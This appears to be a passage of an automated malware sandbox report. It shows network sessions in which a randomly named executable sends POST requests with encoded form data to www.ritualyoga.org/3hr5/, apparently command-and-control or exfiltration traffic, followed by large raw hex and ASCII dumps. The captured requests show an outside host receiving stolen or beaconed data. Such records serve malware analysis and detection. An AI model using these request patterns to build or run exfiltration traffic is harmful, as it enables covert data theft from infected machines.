ba f1 d0 60 a8 2e e4 e0 d2 87 03 cc 66 78 ed 86 54 39 90 47 8c 7c 19 dc c5 2c d7 5b 77 89 cb aa 24 ee 16 97 86 b0 17 a6 93 ea 70 e2 07 5e 25 f2 bc 75 23 36 3b 5a 8e 9a f4 73 87 d4 09 8c 23 af e1 1e fd a9 9b 0e
                                                                                                                              Data Ascii: 1397\mSO36!'MUddwsvWZ@(3FHiwv?G_u$Ua^H;x&TN8i4OGOy~(L(d':C9Cw>55&%&IAqC:PJ0o777pOg2b!`C72<#YS?\J}S7L3MSeu"}p';KbYD@49Oe5C"vgD#IHZ1\1>gbEXB,|/eI2e`5]n5/V;[r*?F<ibh(Taa3`+4+@mn-`~':d2`=TcxsYA44`"^.+IS@$S-FF9S24HmhMjOQ(_E\xCn:0ZD6Z5[Iy<U%h9,DGi7I!<@cD[AIIRE5[K,BbO4Z=u9~82VHCN-WYE ng!=$sCjNnx`7"rj GzWMHyHXx~Vg:.RUNm)S'0C90N}J]r^6b{{;1rMuS:}(paSOA`d~% SBDNFJiJF7K[yC@nent!,9t<}P?D`.fxT9G|,[w$p^%u#6;Zs#
                                                                                                                              Dec 4, 2023 15:23:12.870501995 CET1328INData Raw: 27 32 d9 58 d1 2d 8f 19 cd bf 7c b9 31 63 56 d0 98 c0 f6 86 bc ff 24 0a e0 35 dd c8 fb 55 06 08 86 05 83 32 49 51 55 4a 64 18 17 81 9b ca 93 58 de 3c 98 42 08 ee 41 44 e6 f2 b5 c4 91 bb ee c3 6d cb 94 ac 99 2d a1 b8 10 9b 3a 74 29 b3 99 b9 e9 a4
                                                                                                                              Data Ascii: '2X-|1cV$5U2IQUJdX<BADm-:t)_0]Hd~8A5Qgt)N0g*Xx/m<gzF$ET3i'Gc D(IsKI2e(s=T{tbIVkPc&.JEPJ?<.CWQy0$\
                                                                                                                              Dec 4, 2023 15:23:12.870559931 CET1328INData Raw: 9e a4 12 1d 4d 09 fa ce 62 81 ad 6f 9c 04 d0 de 8b ea 9d e0 f1 f4 a1 42 74 f8 38 76 ab bf c2 3f fb 36 67 4e 80 85 71 3a c1 fb e7 cf f3 e3 3d 8b f5 4f fe 67 07 1d 7b 9d 2b 10 fd 46 a3 ab 94 19 7d 79 23 3f 81 95 f9 64 21 a4 83 03 07 9a 70 24 47 ee
                                                                                                                              Data Ascii: MboBt8v?6gNq:=Og{+F}y#?d!p$G<H+Lh)z4m%gn4B_NB$*tl-:Ked6Dd1C]yK`!r2,6C,Qn)eb2Y1",@S
                                                                                                                              Dec 4, 2023 15:23:12.870615959 CET1328INData Raw: 53 17 ac d6 2f 37 24 13 54 fc 6e 95 b2 05 98 00 a8 bc de 9e c9 79 ee 42 f9 e0 7d 33 8b f9 d0 42 cd a9 ee 01 00 8a 29 d1 14 ec 50 42 57 29 c1 34 0d 2e 26 e8 b8 0f 23 28 93 e3 e0 95 1b cc a5 f0 11 b5 60 ab d0 0c b3 ac be 11 bb b0 a3 41 30 27 f7 ca
                                                                                                                              Data Ascii: S/7$TnyB}3B)PBW)4.&#(`A0'cF4{`c-lXffyr9Sq5)c"sFkUfz-I~3j>E3m<['L9bv3S*(pWXc{^^{971S"M#H
                                                                                                                              Dec 4, 2023 15:23:12.870662928 CET255INData Raw: 22 8c aa dc 7b 6b 0f 3c ef 9e 9e 9c 9e 99 11 b4 ab bc 57 ab 2d 16 0b 07 3b f5 73 37 b8 89 c6 ae 13 c5 63 7b ca 87 4e f7 e2 f4 3c 9b 43 52 87 12 ea f6 90 8f fd e3 f3 ee 2f ed ee 51 e7 88 9e 0c f8 c6 6e c3 d9 dd 76 9a cd 97 f8 5b df 10 2b bf e3 8a
                                                                                                                              Data Ascii: "{k<W-;s7c{N<CR/Qnv[+viloCT/zLzHrTQr;cu{4tT{+v|\61kjjW)F0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.11.2050137216.40.34.41808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:15.367646933 CET1147OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.ritualyoga.org
                                                                                                                              Referer: http://www.ritualyoga.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6f 47 2b 4f 4e 63 4b 67 63 4d 31 59 4d 45 41 74 39 53 74 77 63 41 4f 62 55 74 74 54 78 2f 4a 66 4f 54 4c 34 66 6c 59 58 79 61 36 61 69 31 33 69 41 45 32 33 4b 64 6a 77 70 46 42 4d 75 51 2b 4c 58 67 44 66 67 58 7a 5a 39 4a 4e 75 6c 77 62 6d 56 4a 62 7a 6e 73 7a 53 68 53 6d 55 6d 65 70 34 2f 54 6a 6c 68 35 48 79 4e 5a 32 7a 37 55 61 52 45 61 73 38 68 6f 2b 43 38 32 38 38 59 36 34 67 56 77 45 73 79 62 68 54 69 7a 69 57 30 65 4a 6c 54 4f 31 59 63 76 58 2b 62 74 44 6c 76 34 76 68 46 7a 66 47 33 38 43 39 41 32 4c 79 54 6f 54 42 69 2b 76 6d 6e 71 75 49 74 50 58 6c 36 76 30 38 72 6d 52 32 65 72 54 6b 61 57 68 67 78 39 4f 4b 4d 49 6d 45 74 71 33 53 66 67 44 36 4c 4a 4f 35 43 58 75 76 6c 68 4d 51 2b 35 47 6f 52 42 37 51 44 4f 6d 32 36 72 39 41 38 59 6b 62 5a 4d 67 53 76 76 53 39 31 59 32 6f 31 4c 66 61 35 30 37 53 50 74 6b 6e 38 69 6f 6a 38 74 42 35 6f 4e 78 50 36 6b 49 64 70 50 30 53 55 39 74 66 43 36 59 68 6f 6b 32 2b 4b 4c 6e 30 39 46 43 41 6d 43 33 73 67 54 7a 46 74 42 2f 67 50 4e 42 4d 55 50 4d 72 6c 47 4f 55 54 4e 4a 46 35 47 76 4c 66 52 52 70 31 4e 31 56 79 76 47 78 6e 7a 43 50 43 37 6b 44 63 41 35 68 6e 4c 36 58 43 6c 59 6d 43 46 72 4c 6f 69 6e 4b 51 6f 59 58 75 58 56 34 68 47 76 49 73 4b 6f 78 67 36 78 45 57 38 6b 46 4e 54 66 65 48 55 39 65 69 4d 72 4c 49 4c 6d 75 6e 4c 54 33 58 71 6a 68 50 6a 64 44 35 79 52 4f 4c 46 56 46 79 59 44 5a 41 75 72 46 67 4f 52 39 36 55 34 4d 33 35 52 51 2b 72 41 45 34 37 55 6e 34 6a 31 35 65 4c 54 69 67 41 39 7a 54 69 48 35 75 6b 77 77 76 33 4b 71 77 78 36 43 54 46 66 72 77 37 48 75 74 55 50 4b 33 57 49 3d
                                                                                                                              Data Ascii: TZd=oG+ONcKgcM1YMEAt9StwcAObUttTx/JfOTL4flYXya6ai13iAE23KdjwpFBMuQ+LXgDfgXzZ9JNulwbmVJbznszShSmUmep4/Tjlh5HyNZ2z7UaREas8ho+C8288Y64gVwEsybhTiziW0eJlTO1YcvX+btDlv4vhFzfG38C9A2LyToTBi+vmnquItPXl6v08rmR2erTkaWhgx9OKMImEtq3SfgD6LJO5CXuvlhMQ+5GoRB7QDOm26r9A8YkbZMgSvvS91Y2o1Lfa507SPtkn8ioj8tB5oNxP6kIdpP0SU9tfC6Yhok2+KLn09FCAmC3sgTzFtB/gPNBMUPMrlGOUTNJF5GvLfRRp1N1VyvGxnzCPC7kDcA5hnL6XClYmCFrLoinKQoYXuXV4hGvIsKoxg6xEW8kFNTfeHU9eiMrLILmunLT3XqjhPjdD5yROLFVFyYDZAurFgOR96U4M35RQ+rAE47Un4j15eLTigA9zTiH5ukwwv3Kqwx6CTFfrw7HutUPK3WI=
                                                                                                                              Dec 4, 2023 15:23:15.526899099 CET1328INHTTP/1.1 404 Not Found
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:23:15 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-request-id: e9de628b-bce2-4ae6-911c-2a6ac0d4a849
                                                                                                                              x-runtime: 0.047968
                                                                                                                              content-encoding: gzip
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 34 44 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 3c fd 57 da 48 d7 bf f7 af 98 87 9e 77 c1 ad 84 2f 51 b1 e2 1e 8a 60 6d 51 5c c4 56 b7 a7 87 0d 64 80 d4 90 d0 24 80 b8 cf fe ef ef bd 77 66 92 09 88 75 75 df 1f de 73 5a cf 6e 63 32 73 bf bf 66 e6 4e 0f ff 73 dc ae 77 6f 2e 1a 6c 1c 4e 9c a3 57 87 f8 17 73 4c 77 54 4d 71 37 85 2f b8 69 1d bd 62 ec 70 c2 43 93 0d c6 a6 1f f0 b0 9a 9a 85 c3 ec 7e 8a e5 e8 53 68 87 0e 3f aa 0d 42 db 73 59 dd 73 43 df 73 1c ee 1f b0 c6 dd 80 4f e9 ed c0 9c 8d c6 e1 61 4e 0c c5 49 41 b8 84 49 f0 c4 58 df b3 96 ec 2f 7a 84 5f cc c1 ed c8 f7 66 ae 95 1d 78 8e 07 50 5e 37 6b f8 f3 56 0e 50 6f 4b a5 92 7a 35 31 fd 91 ed 1e b0 fc f4 4e bc fa fb 55 04 78 9b 4d b7 99 e7 6c b3 19 fc 17 5a 11 9e 21 d0 99 1d 9a 13 db 59 1e b0 31 77 e6 3c b4 07 e6 36 9b 73 df 32 5d 78 30 7d db 84 29 81 e9 06 d9 80 fb f6 50 61 a3 99 81 7d cf 0f 80 dc 42 49 e1 64 cc b1 5d 9e 1d 73 1b 38 3d 60 85 fd 15 62 a6 3e 4f 22 17 20 0a 85 18 c0 62 6c 87 3c 1b 4c cd 01 c0 86 f1 d9 85 6f 4e 13 1c c1 4b a3 ef dd c5 d2 f2 7c 0b 25 0d 40 58 e0 39 b6 c5 5e 37 1a 0d 45 e9 d4 b4 2c db 1d c1 e7 48 32 8c ad 09 8b b1 85 6d 85 e3 03 56 29 af d2 8c da e7 7e 84 2d 52 48 be 09 3f 0a 4b ac 31 d0 55 bd 5c 6c 16 77 d6 08 c8 1b 65 3e 61 05 fc 7f 82 9f 71 21 02 1e d1 65 14 61 68 04 3d 29 54 a3 a0 00 30 a6 e9 01 66 24 c1 16 d7 68 4e 12 96 80 5a 2c af a8 ca b0 c0 d8 6d 27 78 4c cc c7 79 fc 89 64 40 7a c8 fa a6 65 cf 82 03 b6 13 eb 54 b1 05 84 c7 f6 c9 98 65 07 53 c7 04 d3 eb 3b de e0 56 81 51 8a d8 5b 55 84 11 cc 26 00 29 76 93 48 b5 30 92 15 22 06 d0 99 88 92 be 17 86 de 24 61 18 49 8a 1f 22 40 ba 4d c4 be 6e b2 8a 8f 35 54 07 cc f5 5c 9e 10 ff eb 01 b8 88 09 de 10 9b 0e 18 2d fa 0c 59 63 44 a2 f4 d6 c8 00 0b f9 fc ff ac 9b ce 03 66 63 04 de cc 1f 70 f6 eb ba f5 c4 92 8f 44 b4 1a 16 d4 ec bf 54 c8 59 77 a2 e3 0a fe 44 da 8d 62 12 58 78 a3 8e 3f 4f d0 98 20 51 97 61 c2 1f 75 6b 10 12 79 40 92 8a 54 c3 32 21 fc 2a 82 35 cb df 8f 25 e6 41 e8 1a 3a de e2 80 99 b3 d0 5b a7 3d 8e a7 cd 66 42 5d 86 ed 0e bd 08 78 2c b6 35 6f 4d 52 63 a0 13 f5 dc d9 a4 cf 7d cd 55 d6 e3 77 52 62 2a 88 d4 6a 51 48 8f e5 02 4e 12 63 8d 8c d9 97 21 35 0e 72 c7 c7 c7 8a c1 90 df 85 59 d3 b1 47 90 00 68 60 92 37 24 72 95 b7 ac c3 87 18 a2 b5 a8 b8 1a 7a d7 81 1c 8c 51 c0 71 48 58 e7 b3 b9 8b 3f eb 33 0d 13 52 e3 3c a6 e2 a1 14 d7 ac c3 9f e4 d4 b1 6d 59 dc 8d 10 46 0e bb e6 6e 60 18 4c 49 b5 b2 9f af e4 cb 6f d9 df 64 db e6 c1 dc 0e 20 a7 40 da 8b 46 ec ee ee 46 9f 8d d0 87 5c 93 1d fa e6 84 83 0a 1f 1c a3 f8 8e 3e ca 48 aa 50 24 60 18 01 77 f8 20 89 50 8c 87 e1 d2 dd 5e 43 76 0f 79 2f 34 fb 8e 92 49 14 fb 85 04 64 80 00 9e 1c 73 1a 40 2e 54 4f f8 99 e0 24 60 84 98 a6 58 a8 74 b3 12 01 8b b1 d5 58 96 f5 38 04 c8 ad 18 36 a5 cc 57 00 29 b9 6f 26 40 4d 0f c7 12 c2 8a c3 0b ee 92 19 4d c6 d3 27 01 b5 dd e9 2c 7c 1d 70 d3 1f 28 0c d9 05 ef df da e0 00 d3 29 bc 36 5d ac 1c d0 23 86 36 77 36 31 4b f5 d6 26 71 69 95 c4 66 71 49 08 07 6e 38 ce 0e c6 b6 63 65 3c cb da 52 62 d3 a3 e5 b0 88 3f 1b a4 8e 60 0c 7e 07 ee d1 9b 98 e1 60
                                                                                                                              Data Ascii: 14DB<WHw/Q`mQ\Vd$wfuusZnc2sfNswo.lNWsLwTMq7/ibpC~Sh?BsYsCsOaNIAIX/z_fxP^7kVPoKz51NUxMlZ!Y1w<6s2]x0})Pa}BId]s8=`b>O" bl<LoNK|%@X9^7E,H2mV)~-RH?K1U\lwe>aq!eah=)T0f$hNZ,m'xLyd@zeTeS;VQ[U&)vH0"$aI"@Mn5T\-YcDfcpDTYwDbXx?O Qauky@T2!*5%A:[=fB]x,5oMRc}UwRb*jQHNc!5rYGh`7$rzQqHX?3R<mYFn`LIod @FF\>HP$`w P^Cvy/4Ids@.TO$`XtX86W)o&@MM',|p()6]#6w61K&qifqIn8ce<Rb?`~`
                                                                                                                              Dec 4, 2023 15:23:15.526979923 CET1328INData Raw: cc 83 ed 35 dd d2 98 e1 ec fe 7e a9 c6 ac a1 51 81 ad 85 de 7f e2 39 e0 35 1d cf ba e1 0e 04 c3 84 41 a9 a4 28 2a 25 34 8c 4b c7 0c f9 89 cf 97 4f a6 10 04 f7 24 22 63 f9 6a e2 88 5d f7 e9 b6 a5 4a d6 c8 96 a0 b8 60 25 19 ba 84 d9 4c cd 70 dc 4b
                                                                                                                              Data Ascii: 5~Q95A(*%4KO$"cj]J`%LpK,$eC5KQfd)(Bo4/>cGzfGwCcZ`,0dIsQ2iKS=fplh:ATk`#b?$MH(EE7J'Ww1<(gbLr.eF
                                                                                                                              Dec 4, 2023 15:23:15.527041912 CET1328INData Raw: fb e4 41 c8 a1 a3 29 80 be 33 9f c1 d6 37 9c 04 e0 de 8b e8 9d a0 f1 f8 21 83 74 d8 70 ec 96 7f 0b 7f 1d ea 9c 19 0e 2c 8c c3 31 bc 7f f3 26 3e de d3 58 ff 62 7f 35 a0 63 af 31 07 a2 5b 12 5d 26 4d e8 d3 db f1 09 2c 8f 27 33 c6 0d 38 70 c0 09 c7
                                                                                                                              Data Ascii: A)37!tp,1&>Xb5c1[]&M,'38p|h0#h<z!8:%{6Xe35AA_NX?e]]/n3)5 R)e)bonr**,bKcZ:lCR~5YD^)96n
                                                                                                                              Dec 4, 2023 15:23:15.527101040 CET1328INData Raw: e3 64 d2 89 16 eb 2f 5a e8 47 10 5f d3 5b d8 05 2b f5 4b 0d c9 08 15 7e d7 4a d9 04 4c 00 28 bc 5e 9f 49 79 ee 52 f8 e0 63 33 93 f9 50 43 4d a9 ee 09 00 92 29 51 15 ec a0 84 8e 50 82 6a 1a 5c 8c a1 e3 de f5 40 99 14 07 e7 a6 33 e3 cc 86 a8 05 b6
                                                                                                                              Data Ascii: d/ZG_[+K~JL(^IyRc3PCM)QPj\@3!7dXmq&!`U=`-thfaj`i(j UiDKULzDMT=ejOf!AAmX$TS;#C3!lo[TSrOfoQ<8P7<
                                                                                                                              Dec 4, 2023 15:23:15.527153015 CET579INData Raw: e5 ce ef cc af 35 76 f6 ae dc 9d 6f 85 32 6f 75 ed 51 ad 72 df b5 df 97 67 b7 8b c5 bc f4 f1 fb e2 6e b7 de 6d 0e fd c5 de fb 59 78 75 f1 b1 f4 f9 b4 2a ac e1 6f b0 42 bc aa 21 af f5 c8 7b 0b f2 de bf b8 54 84 37 34 e4 7b 79 fb 3e 85 57 1c d6 6f
                                                                                                                              Data Ascii: 5vo2ouQrgnmYxu*oB!{T74{y>Wo$nhi2[##J+Vt]Bz %D/W=e/~ctyi\jy6{zqUham1ysv^m{5CCem'


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.11.2050138216.40.34.41808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:18.008508921 CET1340OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.ritualyoga.org
                                                                                                                              Referer: http://www.ritualyoga.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6f 47 2b 4f 4e 63 4b 67 63 4d 31 59 4d 45 41 74 39 53 74 77 63 41 4f 62 55 74 74 54 78 2f 4a 66 4f 54 4c 34 66 6c 59 58 79 61 43 61 6c 48 76 69 41 6e 65 33 4a 64 6a 77 6b 6c 42 4a 75 51 2b 57 58 67 71 55 67 58 76 6a 39 4c 31 75 6b 68 4c 6d 53 37 6a 7a 73 4d 7a 58 6b 53 6d 57 77 75 70 57 2f 54 75 6d 68 35 44 69 4e 4a 79 7a 36 54 65 52 44 74 34 37 72 59 2b 45 38 32 38 67 63 36 34 65 56 77 51 38 79 62 64 54 69 77 61 57 79 74 78 6c 52 5a 68 59 56 66 58 35 51 4e 44 71 30 49 75 5a 46 7a 62 53 33 38 43 44 41 7a 7a 79 54 72 62 42 6a 39 48 68 6e 4b 75 49 73 50 58 6d 74 2f 34 47 72 6d 4e 75 65 72 6e 6b 61 56 52 67 77 64 4f 4b 4a 73 79 44 71 4b 33 55 56 41 44 74 50 4a 53 78 43 58 53 64 6c 67 6f 51 2f 4b 36 6f 53 57 76 51 54 66 6d 32 6b 62 39 43 7a 34 6c 66 58 73 68 57 76 75 2b 62 31 63 43 53 31 4a 54 61 35 55 62 53 4b 4d 6b 6b 34 43 6f 74 7a 4e 42 67 6a 74 30 41 36 6b 59 37 70 50 30 43 55 38 35 66 43 4c 6f 68 70 68 61 35 4d 62 6e 7a 31 6c 44 59 77 79 37 78 67 54 2f 4e 74 42 57 6c 50 4d 46 4d 56 76 4d 72 67 6d 79 62 5a 39 4a 43 37 47 75 53 62 52 51 68 31 4e 35 76 79 72 58 45 67 43 36 50 44 4c 30 44 5a 51 35 2b 73 4c 36 54 4e 46 5a 74 54 31 72 4c 6f 69 71 37 51 6f 63 58 75 6d 74 34 67 78 6a 49 6e 39 55 78 37 36 78 43 57 38 6c 64 4e 54 61 75 48 55 31 77 69 4a 6a 74 49 4f 57 75 6d 66 58 33 57 76 58 69 4c 54 63 4a 39 79 52 56 56 31 5a 6f 79 59 66 52 41 71 50 37 6e 2b 39 39 37 56 49 4d 31 4a 52 58 37 4c 41 44 76 4c 55 31 38 6a 34 34 65 4b 37 63 67 41 68 6a 54 67 33 35 72 6a 39 63 33 30 4f 72 70 7a 47 41 55 6a 4c 44 7a 34 4f 36 77 30 71 4f 6f 54 58 74 56 72 6d 43 56 4a 77 37 66 4e 7a 6d 4d 58 57 4f 38 41 5a 71 42 48 46 64 4f 43 63 44 7a 6b 45 4d 77 6a 68 2b 49 6b 6e 4c 4f 4d 5a 6c 56 66 45 7a 43 37 73 56 70 41 46 2f 38 43 4c 77 73 66 79 79 49 41 66 41 39 68 76 4f 7a 4f 56 57 6d 2b 69 6f 32 72 78 76 65 45 32 4d 55 45 44 2b 67 6a 61 6a 5a 76 53 6f 37 42 48 39 4c 38 54 45 63 61 62 75 54 78 34 59 45 37 63 39 38 50 36 6b 70 75 6d 48 68 33 35 2f 47 45 39 71 70 4d 53 70 35 49 72 30 57 56 4e 62 39 6d 74 34 77 6a 73 57 31 49 63 66 39 59 54 6b 33 5a 4a 56 73 7a 6d 45 6d 30 52 66 4f 55 47 34 61 78 49 32 6a 78 46 73 73 73 54
                                                                                                                              Data Ascii: TZd=oG+ONcKgcM1YMEAt9StwcAObUttTx/JfOTL4flYXyaCalHviAne3JdjwklBJuQ+WXgqUgXvj9L1ukhLmS7jzsMzXkSmWwupW/Tumh5DiNJyz6TeRDt47rY+E828gc64eVwQ8ybdTiwaWytxlRZhYVfX5QNDq0IuZFzbS38CDAzzyTrbBj9HhnKuIsPXmt/4GrmNuernkaVRgwdOKJsyDqK3UVADtPJSxCXSdlgoQ/K6oSWvQTfm2kb9Cz4lfXshWvu+b1cCS1JTa5UbSKMkk4CotzNBgjt0A6kY7pP0CU85fCLohpha5Mbnz1lDYwy7xgT/NtBWlPMFMVvMrgmybZ9JC7GuSbRQh1N5vyrXEgC6PDL0DZQ5+sL6TNFZtT1rLoiq7QocXumt4gxjIn9Ux76xCW8ldNTauHU1wiJjtIOWumfX3WvXiLTcJ9yRVV1ZoyYfRAqP7n+997VIM1JRX7LADvLU18j44eK7cgAhjTg35rj9c30OrpzGAUjLDz4O6w0qOoTXtVrmCVJw7fNzmMXWO8AZqBHFdOCcDzkEMwjh+IknLOMZlVfEzC7sVpAF/8CLwsfyyIAfA9hvOzOVWm+io2rxveE2MUED+gjajZvSo7BH9L8TEcabuTx4YE7c98P6kpumHh35/GE9qpMSp5Ir0WVNb9mt4wjsW1Icf9YTk3ZJVszmEm0RfOUG4axI2jxFsssT
                                                                                                                              Dec 4, 2023 15:23:18.172467947 CET5198OUTData Raw: 51 57 32 38 4d 57 74 75 6d 55 68 4e 73 61 51 51 45 45 5a 43 4b 73 46 4e 58 72 35 6e 72 6f 64 70 76 42 42 69 68 76 32 51 4c 37 78 6d 76 53 59 6b 6e 76 78 6b 6e 5a 6a 76 71 34 65 50 46 7a 72 32 62 75 42 38 37 58 41 4c 4b 2f 35 50 53 51 65 77 41 5a
                                                                                                                              Data Ascii: QW28MWtumUhNsaQQEEZCKsFNXr5nrodpvBBihv2QL7xmvSYknvxknZjvq4ePFzr2buB87XALK/5PSQewAZENCxy/qMCxlHyzx6WGK6ndGh7N4dDKcCGW+xyW3p7h95aTCQoTa6b8sGJHH6MooZ9B8QuqykifB9jc8GtvcvmgdCYq/zl3v4Jhkl3tRL9nXhla4tXiC6WRCOpi0n6ZCgkITB3gqhI/y3ypeZjFqVstPm5rqK5SYOe
                                                                                                                              Dec 4, 2023 15:23:18.172563076 CET9056OUTData Raw: 33 4e 36 70 38 33 41 2b 47 45 6f 39 4f 41 70 33 51 4b 6c 6e 33 6a 4b 64 68 43 43 46 54 35 33 7a 59 6a 50 6e 37 48 5a 7a 61 41 6a 54 32 50 66 70 37 37 76 49 72 30 46 79 68 4a 7a 71 33 6b 66 51 61 53 70 36 68 45 56 50 54 38 34 50 39 49 37 2b 30 49
                                                                                                                              Data Ascii: 3N6p83A+GEo9OAp3QKln3jKdhCCFT53zYjPn7HZzaAjT2Pfp77vIr0FyhJzq3kfQaSp6hEVPT84P9I7+0Iz0C6y5UZn4ZLhkXjZ/utX5VviGl4iH6lWsNXCj+qb86N3A9Qx9vPMbSPmJ/kBBS7PWBXWZbT3qhbKts3N9YjiE6nDlicWoRRrAWJnz/Z2W+e6jmkkstrMPMdDFy0i3H3Zye2vucg6FEHc41qrEtgY6PuV9hB3uB0y
                                                                                                                              Dec 4, 2023 15:23:18.282916069 CET5198OUTData Raw: 51 56 49 52 36 49 68 79 56 75 47 67 32 78 67 39 37 44 45 72 4a 69 64 4e 50 46 53 4c 68 35 35 61 38 41 33 76 30 34 43 4c 73 59 48 30 6a 45 64 30 51 6a 6d 4b 30 64 48 69 31 46 35 4b 53 66 6c 57 77 52 58 69 74 43 30 4b 4e 55 69 4f 68 64 45 69 6d 54
                                                                                                                              Data Ascii: QVIR6IhyVuGg2xg97DErJidNPFSLh55a8A3v04CLsYH0jEd0QjmK0dHi1F5KSflWwRXitC0KNUiOhdEimT1SrDLudCMzsRbz5UIFtDxlgG1b/LtRs/2P+yB6SSyD15Bau84j32KyT2B6WLuYChAnSQIJGRPiVgyR36U+jEU5DKDQBZB9xKSWJvPwRWLpq7JKj94cFBRcXaTUbX2WZX9xP9aeA1a4bcOuW0K4/6ubQJlUfFgPaDO
                                                                                                                              Dec 4, 2023 15:23:18.283009052 CET9056OUTData Raw: 30 65 41 38 6b 41 4b 7a 48 33 45 2b 39 59 67 44 64 6d 63 75 7a 35 61 36 64 64 33 54 35 57 6e 79 44 62 61 4a 49 66 52 48 76 38 61 59 43 50 51 2b 66 55 47 2b 35 65 6a 63 39 62 71 75 43 44 33 32 4e 51 38 75 4a 69 56 43 53 71 4b 61 49 35 66 38 58 54
                                                                                                                              Data Ascii: 0eA8kAKzH3E+9YgDdmcuz5a6dd3T5WnyDbaJIfRHv8aYCPQ+fUG+5ejc9bquCD32NQ8uJiVCSqKaI5f8XTD6HLMJabJ/q6a7GYssteHb5gEPc2z1ah9HjFBibNtwY2OmWgnva1MHNxkMBivxIQDcr5K5HQ1I7BgN42uc+C6QZ0ON5ysXUo/nedyIxlnlsrRJlIeUPrPGjB8mmcu7jgwU6PcDa68I6kzJCM5YcBcXrJNWb74TSCe
                                                                                                                              Dec 4, 2023 15:23:18.283077002 CET6484OUTData Raw: 50 4f 38 32 63 2b 69 6c 36 31 53 75 42 6a 33 4b 37 54 45 77 4d 42 34 50 51 61 4e 36 63 71 49 4f 53 48 6e 73 6b 31 78 41 66 70 71 77 6c 77 55 2f 77 48 6c 36 66 4a 37 50 4e 7a 77 41 6f 59 79 77 36 72 59 59 49 5a 78 64 4a 39 6b 63 73 48 6e 2f 69 4d
                                                                                                                              Data Ascii: PO82c+il61SuBj3K7TEwMB4PQaN6cqIOSHnsk1xAfpqwlwU/wHl6fJ7PNzwAoYyw6rYYIZxdJ9kcsHn/iMk825GWNNk2ez3E554v2fHYW2E7c7MlcOrs/y9FdOaW1nCsliJbrHlbRGAh9zZ8fwFvjBSoPkauNYf8jt2e4qxs5Q6m3WsGDcDB+eFzbY/MbppMPlboXiCioszxDf12cWKQBnGxxk1lZiC8QFGVhGn+6E7h7FakeR9
                                                                                                                              Dec 4, 2023 15:23:18.283284903 CET5198OUTData Raw: 71 7a 6b 68 6e 75 53 72 73 53 79 50 55 6d 64 38 4a 65 6f 70 50 34 2f 49 41 37 4b 31 34 2f 70 4b 4f 6d 52 6d 41 42 4e 57 70 66 37 77 37 4f 6e 43 4f 38 32 79 4a 52 53 56 76 55 49 61 68 4b 53 36 4f 39 34 6f 4e 2f 75 52 44 6a 79 31 39 72 43 6b 67 4c
                                                                                                                              Data Ascii: qzkhnuSrsSyPUmd8JeopP4/IA7K14/pKOmRmABNWpf7w7OnCO82yJRSVvUIahKS6O94oN/uRDjy19rCkgLiJQ107PYYP8iq407LYOyrafODMZW0NppDDP3bkkd3oZueFjvHDOT/Brj9KtefKPMC+6SKQzIGKtaiXvPINkLDcl004+SN0IjdT4mgN4gas7qmKQ88NfYm2ZinKz2+aPFeCUH2xbZSzHJncnl4F4D3DDmEZmnq8Bnw
                                                                                                                              Dec 4, 2023 15:23:18.336267948 CET2626OUTData Raw: 4f 51 32 52 36 61 41 42 69 2b 61 63 34 58 66 30 31 78 6a 46 48 67 70 46 58 63 62 67 7a 79 35 6b 37 42 30 33 6b 74 51 2f 6a 36 35 6a 4b 73 61 35 6d 43 63 4b 46 69 71 30 73 49 4c 39 4e 6d 35 76 33 5a 6c 50 79 65 37 51 38 35 54 76 4f 76 4b 73 63 38
                                                                                                                              Data Ascii: OQ2R6aABi+ac4Xf01xjFHgpFXcbgzy5k7B03ktQ/j65jKsa5mCcKFiq0sIL9Nm5v3ZlPye7Q85TvOvKsc8MmJZcjdXwE8nXNm3GxOqZtRC8Gcbhke+d7ogDmBmhcTAhhMD02lcLVrakTcmTfUrsZLhUpvhPsEsax3eRAtSf2RefeSYDfoI5699nRJoYULZ15438O0mB8jI71xYVIHwUNWCtjzzb93Z1WWDK0evzU351wD3noKsx
